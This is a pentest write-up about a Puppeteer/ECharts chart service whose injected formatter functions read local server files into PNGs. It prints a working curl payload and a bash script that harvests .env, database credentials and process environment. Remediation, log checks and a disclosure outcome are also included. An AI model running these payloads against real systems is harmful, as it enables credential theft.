Marco Altomare
From a Single IP to Exfiltrated Passwords in a PNG: My First Freelance Pentest Engagement

Disclaimer: This article describes a security research activity carried out in a controlled context, with educational goals and the aim of improving security. All references to IPs, domains, paths, file names, and configurations have been anonymized or modified to prevent any form of harm or unauthorized enablement. Nothing below is an invitation to test systems without a written mandate from the owner or legal responsible party.

A real, anonymized case: from PoC to local file reading, ending with a report a CTO can actually use.

My first freelance penetration testing engagement came in a very concrete way: a technical contact asked me to verify a Linux server exposed on the internet, with a custom web application already in production and some collateral services publicly accessible. This was not the classic setting of a large structured program: it was a real system to assess, a tight perimeter, and a simple but demanding request — understand how exposed it really was.

It was immediately clear to me that this was not a theoretical exercise. There was a real infrastructure, a precise objective, and the responsibility to turn technical observations into results that would actually be useful to the people running that system.

In this article I focus on the most interesting part: how a seemingly small surface can lead to a much deeper discovery chain, and why some exploits stand out not only because of their impact, but because of their technical elegance.

For me, this was a real exam. No company badge, no senior colleague to pass doubts to. Just the mandate, the objectives, the tools I use every day, and the responsibility to deliver solid results to a real client.

In this article I explain what I found from a technical perspective and what I learned from a professional one. It is a showcase of how I approach a black-box test, from the first packet to the final report.

The perimeter: one server, many surfaces

The target was a single Linux host with a public IP in the form of XXX.XXX.XXX.XXX and an application domain I will call api.example.com. The environment was not spread across multiple machines or microservices, but concentrated on a single instance with several services listening.

From the reconnaissance phase, the main exposed surfaces were:

  • Port 80 and 443: a public PHP API based on a custom framework.
  • Port 3001: a Node.js service that generates chart images from ECharts configurations.
  • Port 8999: an XHProf interface, a PHP profiler, reachable from the outside without authentication.

The stack consisted of Nginx as reverse proxy, a PHP web application, a Node.js service orchestrating Puppeteer, and a MySQL backend. The main webroot had the classic shared-hosting structure, similar to /data/wwwroot/, with separate directories for the PHP API and the chart-generation service.

Even from this point there were some interesting signals: an exposed profiler, a Node service rendering user input through a headless browser, and a custom PHP framework. These are three ingredients that, if combined poorly, can lead to deep vulnerabilities.

Mapping the attack surface in practice

The first phase was mapping: understanding what responded on each port, which endpoints existed, and what kind of input they accepted.

On the PHP API, the application responded in JSON even for nonexistent routes. The custom framework used a central router that, for unregistered paths, returned a standard message like:

{"code": 99, "msg": "route not exists"}

This made errors less informative, but it was enough to understand that I was not dealing with a mainstream framework like Laravel or Symfony.

The most interesting port was 3001. There lived a Node.js service exposing three main endpoints:

  • POST /api/generate-chart
  • GET /api/health
  • GET /images/:filename

The behavior was clear:

  • POST /api/generate-chart accepted an ECharts JSON object, passed it to Puppeteer, and returned a PNG.
  • GET /api/health confirmed the service status with a lightweight response.
  • GET /images/:filename exposed the generated PNGs, saved on disk in a dedicated directory.

On port 8999, XHProf was exposed. A legitimate tool for profiling PHP applications, but one that is meant for internal environments, not the public internet.

From XHProf I was able to extract valuable information:

  • internal class names such as MysqlHelper, GlobalVar, FuncHelper.
  • use of KLogger for application logging.
  • filesystem directory structure, including paths under the webroot.
  • internal PHP application route patterns.

In practice, XHProf acted as involuntary technical documentation for the backend.

The chart-generation API: Puppeteer as a pivot

The service on port 3001 took as input an ECharts option object and rendered it through a headless Chromium instance managed by Puppeteer.

The idea is simple and useful: instead of generating charts on the client side in the user’s browser, the application generates them server-side and returns a PNG image that can be embedded anywhere.

At a high level, the flow was:

  • The client sends a POST /api/generate-chart request with a JSON payload containing the ECharts configuration.
  • Node.js creates a headless page with Puppeteer.
  • The page loads ECharts, applies the received options, and renders the chart.
  • Puppeteer captures a screenshot of the chart area and saves it as a PNG in a local directory.
  • The API returns the file path and a fileName that can be downloaded through GET /images/:filename.

Functionally, it is a perfect service for automatic report generation. From a security perspective, however, everything depends on what is allowed inside the ECharts code.

And that is where the interesting part begins.

From the ECharts formatter to local file reading

In ECharts configuration, the label.formatter field can accept a JavaScript function, not just a string.

Normally this function is used to customize series labels, adding percentages, symbols, or special formatting. In the context of a headless browser running server-side, with the file:// protocol available, that function becomes a small sandbox escape point.
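
For context, a benign formatter normally just shapes label text. A generic sketch (not taken from the client's code):

```javascript
// Typical, harmless use of an ECharts label formatter:
// turn each pie slice into a "name: value (percent%)" label.
const option = {
  series: [{
    type: "pie",
    data: [{ value: 3, name: "ok" }, { value: 1, name: "ko" }],
    label: {
      show: true,
      // ECharts invokes this once per data item with a params object
      formatter: function (p) {
        return p.name + ": " + p.value + " (" + p.percent + "%)";
      }
    }
  }]
};

// Simulate the call ECharts would make for the first slice:
const label = option.series[0].label.formatter({ name: "ok", value: 3, percent: 75 });
console.log(label); // "ok: 3 (75%)"
```

The problem is not the feature itself: it is accepting such a function from an untrusted client and executing it server-side.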

The core of the vulnerability I found is this:

  • the service accepts arbitrary JavaScript functions in option.series[].label.formatter
  • Puppeteer executes them in the page context, without limiting access to the file:// protocol
  • the JavaScript code can instantiate objects such as XMLHttpRequest and read local files
  • the text read can be returned by the formatter function and thus rendered inside the chart
  • all generated content is captured in the PNG and served over HTTP via /images/:filename

This leads to a vulnerability that can be described as file:// SSRF with arbitrary local file reading, combined with path traversal.
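
Stripped of its JSON escaping, the injected formatter is essentially the following plain JavaScript (reconstructed here for readability; it only does something meaningful inside the server-side headless browser, where file:// is reachable):

```javascript
// What the rendered page ends up executing for each label.
// Synchronous XHR is deprecated, but Chromium still supports it,
// and it keeps the exfiltration to a single expression chain.
function leakFormatter(p) {
  var x = new XMLHttpRequest();
  x.open("GET", "file:///etc/passwd", false); // synchronous request
  x.send();
  // The response text is returned as the label string,
  // so it gets drawn into the chart and baked into the PNG.
  return x.responseText.substring(0, 500);
}
```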

The proof of concept I used to confirm the exploit, properly anonymized, looks like this:

curl -s -X POST http://XXX.XXX.XXX.XXX:3001/api/generate-chart \
  -H "Content-Type: application/json" \
  -d '{
    "option": {
      "title": {"text": "FILE_READ_POC"},
      "series": [{
        "type": "pie",
        "data": [{"value": 1, "name": "leak"}],
        "label": {
          "show": true,
          "formatter": "function(p){ var x=new XMLHttpRequest(); x.open(\"GET\",\"file:///etc/passwd\",false); x.send(); return x.responseText.substring(0,500); }"
        }
      }]
    }
  }' 

The API response confirms the PNG generation and provides the file name:

{
  "success": true,
  "imagePath": "data/wwwroot/echarts-to-image/images/chart-UUID.png",
  "imageUrl": "images/chart-UUID.png",
  "fileName": "chart-UUID.png"
} 

By downloading the PNG with:

curl -s http://XXX.XXX.XXX.XXX:3001/images/chart-UUID.png -o out.png
strings out.png | head 

...it is possible to see the contents of /etc/passwd rendered as text inside the image.

From there, the vulnerability becomes a true arbitrary local file read with the privileges of the Node.js process.

In terms of severity, a combination of file-based SSRF and unauthenticated arbitrary file reading on an exposed service deserves a high classification. The estimated CVSS score was 8.6 High.

Reconstructing the filesystem from scratch

By combining the information obtained from XHProf with file reading via Puppeteer, I was able to reconstruct the filesystem structure in a fairly detailed way.

A simplified representation, with anonymized names, is the following:

/
├── etc/
│   ├── passwd                    # system user enumeration
│   └── environment               # system environment variables
├── proc/
│   ├── self/environ              # Node.js process env
│   └── self/cmdline              # process startup command
├── root/
│   ├── flag.txt                  # CTF flag or sentinel file
│   └── flag                      # variant of the same flag
├── tmp/                          # temporary files, possible sessions
├── var/
│   └── log/
│       └── nginx/                # access.log, error.log
└── data/
    └── wwwroot/
        ├── echarts-to-image/     # vulnerable Node.js service
        │   ├── app.js            # Node.js source code
        │   ├── index.js
        │   ├── package.json
        │   ├── .env              # specific environment variables
        │   └── images/           # PNGs generated and accessible via HTTP
        └── api-php/              # main PHP application
            ├── index.php
            ├── config/
            │   └── database.php  # MySQL credentials
            ├── framework/
            │   ├── core/
            │   │   ├── Route.php
            │   │   ├── BaseApi.php
            │   │   └── GlobalVar.php
            │   └── libs/
            │       ├── MysqlHelper.php
            │       └── FuncHelper.php
            ├── Lists.php
            ├── .env              # PHP application secrets
            └── runtime/          # KLogger application logs 

For a black-box test, reaching a map like this from the internet alone means you already have rich material for a high-value report: not just a personal achievement, but a concrete basis for discussion with the client.

Automating exfiltration: the read script

Once I had proved that reading /etc/passwd was possible, the challenge became organizational. It made no sense to repeat the same request manually for every single file.

I therefore prepared a collection script that, starting from a list of interesting paths, sends the request to the generate-chart endpoint, retrieves the generated PNG, and runs strings to quickly extract any secrets.

A simplified, anonymized version of the script is this:

#!/usr/bin/env bash

BASE_URL="http://XXX.XXX.XXX.XXX:3001"
OUT_DIR="/tmp/loot"
mkdir -p "$OUT_DIR"

read_file() {
  local target="$1"
  local label="${target//\//_}"

  fname=$(curl -s -X POST "$BASE_URL/api/generate-chart" \
    -H "Content-Type: application/json" \
    -d "{
      \"option\": {
        \"title\": {\"text\": \"LEAK\", \"fontSize\": 12},
        \"series\": [{
          \"type\": \"pie\",
          \"data\": [{\"value\": 1, \"name\": \"x\"}],
          \"label\": {
            \"show\": true,
            \"formatter\": \"function(p){ var x=new XMLHttpRequest(); x.open('GET','file://$target',false); x.send(); return (x.responseText||'EMPTY_OR_NOT_FOUND').substring(0,800); }\"
          }
        }]
      }
    }" | grep -o '"fileName":"[^"]*"' | cut -d'"' -f4)

  if [[ -n "$fname" ]]; then
    curl -s "$BASE_URL/images/$fname" -o "$OUT_DIR/$label.png"
    echo "[+] $target -> $OUT_DIR/$label.png"
    strings "$OUT_DIR/$label.png" | grep -iE \
      "password|secret|key|token|api|mysql|db_|flag|ctf|\\{[a-zA-Z0-9_]+\\}"
  else
    echo "[!] No PNG generated for $target"
  fi
  sleep 1
}

# Critical targets
read_file "/proc/self/environ"
read_file "/data/wwwroot/api-php/config/database.php"
read_file "/data/wwwroot/echarts-to-image/app.js"

# High-priority targets
read_file "/data/wwwroot/echarts-to-image/.env"
read_file "/data/wwwroot/api-php/.env"
read_file "/root/flag.txt"
read_file "/root/flag"
read_file "/flag.txt"
read_file "/flag"

# Possible alternative names for the flag
for name in secret secret.txt password root.txt token.txt answer.txt hidden.txt; do
  read_file "/root/$name"
  read_file "/$name"
done

# Logs and system information
read_file "/var/log/nginx/access.log"
read_file "/etc/passwd"
read_file "/proc/self/cmdline"

echo "All PNGs are in $OUT_DIR"
echo "Quick analysis: strings $OUT_DIR/*.png | grep -iE 'flag|pass|key|secret'"

This script has three qualities that, as a freelancer, matter a lot to me:

  • it is repeatable and documentable
  • it reduces room for human error
  • it shows the client clearly that the exploit is real and industrializable

Hunting hard-coded secrets

The files of interest fell into three categories:

  • system files with informational value, such as /etc/passwd or /proc/self/cmdline
  • critical application files, such as database.php, .env, app.js
  • possible flag or sentinel files in /root or at the filesystem root

In particular, some key targets were:

  • /proc/self/environ: the Node.js process environment, with possible credentials or runtime-injected tokens
  • /data/wwwroot/api-php/config/database.php: plaintext MySQL credentials, often reused
  • /data/wwwroot/echarts-to-image/app.js: Node.js service source code, possibly with hard-coded keys
  • .env for both the Node.js service and the PHP application
  • various files under /root and /, with standard or slightly oblique names

No particularly severe hard-coded secrets emerged from the PHP and Node.js code, but the combination of readable files and .env files accessible via SSRF still represented a serious risk.

Forensics: what traces the attack leaves

A part that often gets sidelined in pentest writeups is forensics. I wanted to make it explicit here for two reasons: the client needs to understand what remains in the logs after an attack of this kind, and the professional needs to leave a clean environment behind after a penetration test.

The main activities left traces like these:

  • POST /api/generate-chart and GET /images/... requests ended up in Nginx access.log.
  • Accesses to the XHProf interface were also present in the HTTP logs.
  • Path traversal attempts against the images directory generated errors in error.log.
  • Generated PNGs were physically saved in a dedicated directory, accumulating artifacts on disk.

A hypothetical list of relevant logs, in a similar environment, would be:

/var/log/nginx/access.log           # HTTP requests, including SSRF payloads
/var/log/nginx/error.log            # errors, path traversal, stacktrace
/data/wwwroot/api-php/runtime/      # PHP application logs (KLogger)
/var/log/secure or /var/log/auth.log # SSH access and privilege elevation
/var/log/messages                   # generic system logs
/var/log/wtmp, /var/log/btmp        # login history and failed attempts 

A defender who wants to check for abuse of the vulnerability can start with commands like:

# requests to the chart generation endpoint
grep "generate-chart" /var/log/nginx/access.log

# access to the XHProf interface on the dedicated port
grep "8999" /var/log/nginx/access.log

# path traversal attempts against images (plain and URL-encoded)
grep -iE "images/(\.\./|%2e%2e)" /var/log/nginx/access.log

# IPs with abnormal request volume
awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20 

On my side, in the report I explicitly documented which artifacts the activity left:

  • PNG files under the image directory of the chart-generation service
  • lines in Nginx access.log with requests to /api/generate-chart and /images/...
  • no changes to configurations or files outside the service output directory

This is a point I care about a lot as a freelancer: showing not only what is vulnerable, but also how clean and controlled my activity was.

Health check flood and service recovery

During the tests I also ran into a side issue: a particularly heavy payload had caused the Puppeteer worker to get stuck.

The /api/health endpoint continued to respond, but requests to /api/generate-chart timed out, which suggested that something in the worker was hanging.

In a real environment, this kind of situation can happen with a clumsy attacker or an overly aggressive tester. The practical question becomes: how do you recover the service without direct access to the process?

In this scenario, a controlled health-check flood was enough to force recovery.

The command used was similar to this:

for i in $(seq 1 50); do
  curl -s --max-time 2 http://XXX.XXX.XXX.XXX:3001/api/health &
done
wait 

Fifty parallel requests to the health-check endpoint created enough pressure on Node.js’s event loop to force the process to actively handle the backlog.

The observed result was telling:

  • most /api/health requests succeeded
  • some timed out due to temporary saturation
  • after the flood, the chart-generation endpoint started completing requests again

For the defender, this highlights several design issues:

  • no rate limiting on the health check
  • no isolation of Puppeteer workers
  • dependence on a single Node.js process without strong memory-based auto-restart mechanisms

The mitigation I recommended in the report was to use PM2 or an equivalent setup, with max_memory_restart, multiple instances, cluster mode, and a simple rate limiter on /api/health.

Technical recommendations to the client

The core job of a freelance pentester is not to stop at the exploit. It is to translate findings into concrete actions for the client.

The main technical recommendations I proposed were:

  • drastically limit what the ECharts formatter can execute, avoiding arbitrary input functions
  • block the file:// protocol in the Puppeteer rendering context, using launch options and code-level controls
  • make the XHProf interface private or remove it entirely from exposed environments
  • introduce authentication and authorization on chart-generation APIs to prevent unauthenticated abuse
  • move .env files and sensitive configurations outside the webroot and protect them at the web server level
  • use a secrets management system (Vault, Key Vault, and similar) instead of readable files on disk
  • configure rate limiting and circuit breakers on sensitive endpoints, including health checks

With the client, we also discussed priorities. First, mitigate the vulnerabilities that allow remote reading of configuration files and secrets; then address the “bonus” surfaces like XHProf; and finally work on service resilience, for example with better Puppeteer worker management.

What I learned as a freelance pentester

From a technical point of view, this work allowed me to put several skills into practice:

  • identifying and exploiting an SSRF + file-read chain in a nonstandard context
  • using profiling tools exposed to the internet (XHProf) as intelligence sources, not just as curiosities
  • automating file exfiltration with a script that is robust, maintainable, and extensible
  • connecting application vulnerabilities to concrete impact on configuration, logs, and operational management

From a professional point of view, I took away a few important lessons.

The first is that careful documentation makes a difference. It is one thing to say “there is an SSRF.” It is another to guide the client through the entire path: from the JSON input, to the generated chart, to the PNG containing the contents of a system file.

The second is that, as a freelancer, you cannot afford to be only “the technical person.” You have to explain what you are doing, why you are doing it, and what the impact is, speaking the language of the people holding budgets and priorities. The report is not a bureaucratic attachment; it is the tool that turns an exploit into a security decision.

The third is that a good pentest does not stop at the single vulnerability. Highlighting aspects like available logs, the traces left behind, and recovery options shows the client that you are thinking about the full incident lifecycle, not just the spectacular part.

For me, this first freelance engagement was a real test of all of that. On the exploit side, I confirmed the ability to read arbitrary files on the server through Puppeteer and ECharts, reconstructed the filesystem in a meaningful way, and identified sensitive files that needed protection. On the professional side, I learned how to turn that analysis into a coherent technical story, usable by the client to make decisions.

Final disclaimer: the techniques described in this article were applied exclusively in an authorized and controlled context, against systems for which there was explicit testing authorization. Never test services or infrastructure without the consent of the owner or legal responsible party.

After documenting this vulnerability, I followed responsible disclosure practices and reported the issue privately to the Apache Software Foundation Security Team.

The ASF Security Team reviewed my report and responded promptly. They directed me to the official ECharts security guidelines (https://echarts.apache.org/handbook/en/best-practices/security/), which explicitly state that ECharts treats inputs like label.formatter as trusted code, and that input sanitization is the responsibility of the application developer, not of ECharts itself.

I reviewed the documentation and agree with their assessment. This is not a vulnerability in Apache ECharts. It is an application-level misconfiguration: a developer accepting untrusted user input and passing it directly to ECharts without sanitization, in a server-side rendering context where a headless browser executes it with access to the local filesystem.

The takeaway for developers is clear: if you build a service that accepts ECharts configuration from external users and renders it server-side via Puppeteer or any headless browser, you must treat formatter fields — and all function-type inputs — as untrusted and potentially dangerous. Sanitize, reject, or allowlist them before they ever reach the renderer.
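
One possible allowlist-style check, as an illustrative sketch (the placeholder handling and rejection heuristics are my assumptions, not a complete sanitizer):

```javascript
// Illustrative allowlist check: accept only ECharts template strings
// such as "{b}: {c} ({d}%)", never anything that looks like code.
function sanitizeFormatter(value) {
  if (typeof value !== "string") return null;         // reject non-strings outright
  const stripped = value.replace(/\{[abcd]\}/g, "");  // drop known placeholders
  if (/[{}]|=>|function/.test(stripped)) return null; // leftover code syntax
  return value;
}

console.log(sanitizeFormatter("{b}: {c} ({d}%)"));          // "{b}: {c} ({d}%)"
console.log(sanitizeFormatter("function(p){ /* ... */ }")); // null
```

Since ECharts template placeholders cover most legitimate formatting needs, refusing anything beyond them closes the entire class of injected-function payloads.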

The vulnerability is real. The attack works. The fix is on you.

---

_© 2026 Marco Altomare. All rights reserved._

_Analysis, texts, technical reconstructions, scripts, and original materials contained in this article belong to the author, unless otherwise indicated. Citation is allowed with proper attribution. Republishing, adapting, or commercial use requires prior written authorization._
